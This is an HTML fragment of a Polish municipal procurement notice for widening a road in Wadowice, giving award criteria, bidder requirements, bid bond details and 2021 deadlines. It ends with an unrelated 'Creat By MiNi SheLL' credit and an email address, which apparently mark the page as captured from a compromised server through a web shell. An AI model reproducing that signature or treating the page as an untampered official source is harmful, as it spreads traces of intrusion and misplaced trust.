class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">400 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Punktacja przyznawana ofertom w poszczególnych kryteriach oceny ofert będzie liczona z dokładnością do dwóch miejsc po przecinku, zgodnie z zasadami arytmetyki. W toku badania i oceny ofert Zamawiający może żądać od Wykonawcy wyjaśnień dotyczących treści złożonej oferty, w tym zaoferowanej ceny. Zamawiający udzieli zamówienia Wykonawcy, którego oferta zostanie uznana za najkorzystniejszą.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Wydłużenie terminu rękojmi</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Dodatkowe Doświadczenie Kierownika Budowy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Sytuacja ekonomiczna lub finansowa:<br/>Wykonawca winien posiadać ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na minimum 2 000 000,00 zł (słownie: dwa miliony złotych).<br/>Wykonawca winien posiadać środki finansowe lub zdolność kredytową w wysokości minimum 2 000 000,00 zł (słownie: dwa miliony złotych).<br/> Zdolność techniczna lub zawodowa:<br/>Posiadanie wiedzy i doświadczenia<br/>Wykonawca musi wykazać, że wykonał w okresie ostatnich 7 lat przed upływem terminu składania ofert, roboty budowlane, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dowodów dotyczących robót określających, czy roboty te zostały wykonane należycie, co najmniej dwie roboty budowlane polegające na zrealizowaniu budowy, przebudowy lub rozbudowy drogi klasy min. D wraz z chodnikiem lub ciągiem rowerowym lub ciągiem pieszo – rowerowym lub schodami terenowymi wraz z siecią kanalizacji deszczowej oraz innymi sieciami (długość i rodzaj sieci dowolna: sieć wod-kan lub teletechniczna lub oświetlenia ulicznego lub energetyczna) o wartości robót co najmniej 1 500 000,00 zł brutto każda. <br/><br/>W przypadku Wykonawców ubiegających się wspólnie o udzielenie zamówienia lub korzystania z zasobów podmiotów udostępniających zasoby – warunki określone w pkt. 6.2.4.1 SWZ winny być spełnione przez co najmniej jednego wykonawcę lub podmiot udostępniający zasoby. <br/> Dysponowanie osobami zdolnymi do wykonania zamówienia<br/>Wykonawca musi mieć do dyspozycji osobę legitymującą się kwalifikacjami odpowiednimi do stanowiska, jakie zostaną tej osobie powierzone.<br/>W szczególności Wykonawca będzie dysponował osobami na wymienione poniższej stanowiska:<br/>L.p.	Stanowisko	Kwalifikacje (uprawnienia)<br/>1.	Kierownik budowy	Uprawnienia budowlane do kierowania robotami w specjalności drogowej. Posiada doświadczenie w kierowaniu co najmniej jedną robotą budowlaną w zakresie budowy, przebudowy lub rozbudowy drogi klasy min. D wraz z chodnikiem lub ciągiem rowerowym lub ciągiem pieszo – rowerowym lub schodami terenowymi wraz z siecią kanalizacji deszczowej o wartości 1 500 000,00 zł<br/>1	Kierownik robót w specjalności konstrukcyjno - budowlanej	Uprawnienia budowlane do kierowania robotami w specjalności konstrukcyjno - budowlanej<br/>2	Kierownik robót w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych	Uprawnienia budowlane do kierowania robotami w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych<br/>3	Kierownik robót w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń wodociągowych, kanalizacyjnych i ciepłowniczych	Uprawnienia budowlane do kierowania robotami w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych <br/>4	Kierownik robót w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń telekomunikacyjnych	Uprawnienia budowlane do kierowania robotami w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń telekomunikacyjnych <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Oświadczenie wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2021 r. poz. 275), z innym wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej – załącznik nr 3 do SWZ;<br/>Odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji;</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Dokumenty potwierdzające, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia ze wskazaniem sumy gwarancyjnej tego ubezpieczenia,<br/> Informacja banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzająca wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, w okresie nie wcześniejszym niż 3 miesiące przed jej złożeniem<br/>Wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, porównywalnych z robotami budowlanymi stanowiącymi przedmiot zamówienia, wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów określających czy te roboty budowlane zostały wykonane należycie, w szczególności informacji o tym czy roboty zostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane były wykonywane, a jeżeli <br/>z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty- załącznik nr 4 do SWZ.<br/>Wykaz osób skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami- załącznik nr 5 do SWZ.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Formularz oferty.<br/>Oświadczenie wykonawcy dotyczące spełnienia warunków udziału <br/>w postępowaniu– załącznik nr 1 do SWZ.<br/>Oświadczenie wykonawcy dotyczące przesłanek wykluczenia z postępowania – załącznik nr 2 do SWZ.<br/> Kosztorys ofertowy (szczegółowy w układzie RMS wraz z zestawieniem materiałów i sprzętu) sporządzony zgodnie z dostarczonym przedmiarem robót (z cenami jednostkowymi i wartością pozycji bez podatku VAT), kwotę podatku VAT lub oświadczenie Wykonawcy, że jest zwolniony z płacenia podatku VAT.<br/>Uwaga: Stosowanie się do katalogów KNR, KNNR i innych nie jest obowiązujące.<br/> Pełnomocnictwo do reprezentowania Wykonawców w przedmiotowym postępowaniu o zamówienie publiczne albo reprezentowania Wykonawców w postępowaniu jw. i zawarcia umowy w sprawie przedmiotowego zamówienia, w przypadku Wykonawców ubiegających się wspólnie o udzielenie zamówienia.<br/> Pełnomocnictwo do podpisania oferty, o ile prawo do podpisania oferty nie wynika z innych dokumentów złożonych wraz z ofertą.<br/>Zobowiązanie podmiotu udostepniającego zasoby (jeżeli dotyczy) <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Zamawiający wymaga wniesienia wadium w wysokości 50.000,00 zł (pięćdziesiąt tysięcy złotych).<br/>	Wadium wnosi się przed upływem terminu składania ofert, tj. przed godz.11:00 do dnia 15.09.2021 r.<br/>Wadium utrzymuje się nieprzerwanie do dnia upływu terminu związania ofertą, z wyjątkiem przypadków, o których mowa w art. 98 ust. 1 pkt 2 i 3 oraz ust.2 ustawy Pzp.<br/>Wadium może być wnoszone według wyboru Wykonawcy w jednej lub kilku następujących formach:<br/>a)	Pieniądzu, przelewem na rachunek depozytowy Urzędu Miejskiego w Wadowicach <br/>nr 53 1050 1445 1000 0023 5760 1745 z dopiskiem „wadium w postępowaniu nr IR.271.58.2021 pn. „Rozbudowy drogi gminnej nr 470561K w km od 0+008,34 do km 0+390,09 wraz z przebudową skrzyżowań ul. M. B. Fatimskiej, ul. Poprzecznej, ul. Spółdzielców, Al. Wolności (w km od 0+000,00 do km 0+043,64 w km od 0+390,09 do km 0+417,88 w km od 0+000,00 do km 0+008,34) w miejscowości Wadowice, Gmina Wadowice”. Przed upływem terminu składania ofert, tj. do dnia 15.09.2021 r. godz. 11.00 wadium winno znajdować się na koncie zamawiającego;<br/>b)	gwarancjach bankowych;<br/>c)	gwarancjach ubezpieczeniowych;<br/>d)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z 09.11.2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. 2020, poz. 299). <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia, wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z wykonawców, którzy wykonają roboty budowlane lub usługi, do realizacji których te zdolności są wymagane.<br/>W przypadku, o którym mowa w zdaniu poprz. wykonawcy wspólnie ubiegający się o udzielenie zamówienia przedstawiają Formularzu ofertowym oświadczenie, z którego wynika, które roboty budowlane, dostawy lub usługi wykonają poszczególni wykonawcy.<br/>W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenia, o których mowa w pkt 7.1.1 i 7.1.2 składa każdy z wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu i brak podstaw wykluczenia. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Projektowane Postanowienia Umowy wraz z przewidywanymi zmianami umowy stanowią ROZDZIAŁ III SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-09-15 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę za pośrednictwem „Formularza do złożenia, zmiany, wycofania oferty lub wniosku” dostępnego na ePUAP i udostępnionego również na miniPortalu. Funkcjonalność do zaszyfrowania oferty przez Wykonawcę jest dostępna dla wykonawców na miniPortalu, w szczegółach danego postępowania.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-09-15 12:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-10-14</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Zamawiający żąda od wykonawcy, który polega na zdolnościach lub sytuacji innych podmiotów na zasadach określonych w art. 118 ust.1 ustawy złożenia w odniesieniu do tych podmiotów podmiotowych środków dowodowych wymienionych w pkt. 7.6.2 SWZ wymaganych od wykonawcy.<br/> Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza granicami Rzeczypospolitej Polskiej, zamiast dokumentu, o których mowa w pkt.7.6.2 SWZ, składa dokument lub dokumenty wystawione w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że nie otwarto jego likwidacji ani nie ogłoszono upadłości, jego aktywami nie zarządza likwidator lub sąd, nie zawarł układu z wierzycielami, jego działalność gospodarcza nie jest zawieszona ani nie znajduje się on w innej tego rodzaju sytuacji wynikającej z podobnej procedury przewidzianej w przepisach miejsca wszczęcia tej procedury. Dokument, o którym mowa powyżej, powinien być wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.<br/>Jeżeli w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt.7.6.2 SWZ zastępuje się je odpowiednio w całości lub w części dokumentem zawierającym odpowiednio oświadczenie wykonawcy, ze wskazaniem osoby albo osób uprawnionych do jego reprezentacji, lub oświadczenie osoby, której dokument miał dotyczyć, złożone pod przysięgą, lub, jeżeli w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania nie ma przepisów o oświadczeniu pod przysięgą, złożone przed organem sądowym lub administracyjnym, notariuszem, organem samorządu zawodowego lub gospodarczego, właściwym ze względu na siedzibę lub miejsce zamieszkania wykonawcy.<br/>	Jeżeli z uzasadnionej przyczyny wykonawca nie może złożyć wymaganych przez zamawiającego podmiotowych środków dowodowych, o których mowa w pkt 7.6.3-7.6.4 SWZ wykonawca składa inne podmiotowe środki dowodowe, które w wystarczający sposób potwierdzają spełnianie opisanego przez zamawiającego warunku udziału w postępowaniu.<br/> Zamawiający nie wzywa do złożenia podmiotowych środków dowodowych, jeżeli może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, w szczególności rejestrów publicznych w rozumieniu ustawy z dnia 17 lutego 2005 r. o informatyzacji działalności podmiotów realizujących zadania publiczne, o ile wykonawca wskazał w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy dane umożliwiające dostęp do tych środków;<br/> Wykonawca nie jest zobowiązany do złożenia podmiotowych środków dowodowych, które zamawiający posiada, jeżeli wykonawca wskaże te środki oraz potwierdzi ich prawidłowość i aktualność.<br/> W zakresie nieuregulowanym ustawą lub niniejszą SWZ do oświadczeń i dokumentów składanych przez Wykonawcę w postępowaniu zastosowanie mają w szczególności przepisy rozporządzenia Ministra Rozwoju Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać zamawiający od wykonawcy oraz rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie.

Creat By MiNi SheLL
Email: jattceo@gmail.com